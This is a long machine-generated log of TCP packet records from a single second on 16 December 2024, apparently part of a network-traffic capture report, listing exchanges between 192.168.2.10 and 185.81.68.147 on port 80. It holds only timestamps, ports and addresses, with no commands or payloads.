                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.159846067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.159950018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.164149046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.164246082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.164347887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.168677092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.168863058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.168968916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.173057079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.173160076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.173263073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.177583933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.177644014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.177743912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.294711113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.294842958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.296164989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.296454906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.296562910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.296659946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.300064087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.300200939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.300297022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.303579092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.303688049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.303899050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.307126045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.307229042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.307416916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.310558081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.310683966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.310779095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.314043999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.314131975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.314244986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.317433119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.317533970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.317660093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.320888042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.320971012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.321104050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.324389935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.324579954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.324737072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.327728987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.327853918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.327950954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.331250906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.331335068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.331469059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.334695101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.334765911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.334903002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.338098049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.338200092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.338507891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.341705084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.341811895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.341939926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.344949007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.345071077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.345417976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.348412037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.348512888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.348613977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.351862907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.351983070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.352246046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.355278969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.355376005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.355494022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.358721018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.358838081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.358966112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.362176895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.362287045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.362462997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.365648031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.365698099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.365822077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.369048119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.369139910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.369271040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.372550964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.372711897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.372827053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.375996113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.376111031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.376327038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.379422903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.379540920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.379662037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.382841110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.382973909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.383100033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.386352062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.386451960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.386555910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.389745951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.389934063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.390043974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.393146992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.393263102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.393379927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.396534920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.449678898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.487303019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.487385035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.487580061 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.488761902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.488876104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.491792917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.491905928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.491923094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.492996931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.494761944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.494873047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.494949102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.497742891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.497848988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.498001099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.500667095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.500777006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.500909090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.503504038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.503617048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.504916906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.506356955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.506444931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.508855104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.509037971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.509140968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.511673927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.511734009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.511775970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.512283087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.514265060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.514353991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.514410019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.516882896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.516961098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.517021894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.519433022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.519526958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.520874023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.521939993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.522058010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.524462938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.524523020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.524643898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.524840117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.527216911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.527235985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.527297974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.529514074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.529623032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.529690027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.532037973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.532108068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.532866001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.534512997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.534614086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.536849022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.537015915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.537137032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.539547920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.539606094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.539645910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.540874958 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.542169094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.542285919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.542342901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.544573069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.544734001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.544800043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.547081947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.547194958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.547255993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.549643040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.549719095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.549779892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.552165985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.552315950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.552896023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.554655075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.554750919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.554886103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.557199001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.557265997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.559689999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.559766054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.559804916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.560857058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.562313080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.562344074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.562482119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.564728975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.564779997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.564861059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.567219019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.567327976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.568856955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.569710016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.569824934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.572302103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.572371006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.572375059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.572848082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.574771881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.574960947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.575128078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.577390909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.577466011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.577532053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.579807043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.579853058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.579911947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.582305908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.582465887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.582551003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.585263014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.585398912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.585475922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.587346077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.587449074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.587516069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.589898109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.590022087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.590078115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.591223001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.592380047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.592518091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.592622042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.594964027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.595040083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.595168114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.597486019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.597532988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.597660065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.599982023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.600197077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.600250006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.602511883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.602622032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.602741957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.604974985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.605118990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.605232000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.607605934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.607695103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.608908892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.610032082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.610136986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.612679958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.612761974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.612803936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.612839937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.615031004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.615154028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.615276098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.617585897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.617660046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.617712021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.620058060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.620110989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.620234966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.679461956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.679554939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.680222988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.680356026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.680382013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.680841923 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.682286024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.682404995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.684437037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.684525967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.684566021 CET4972380192.168.2.10185.81.68.147
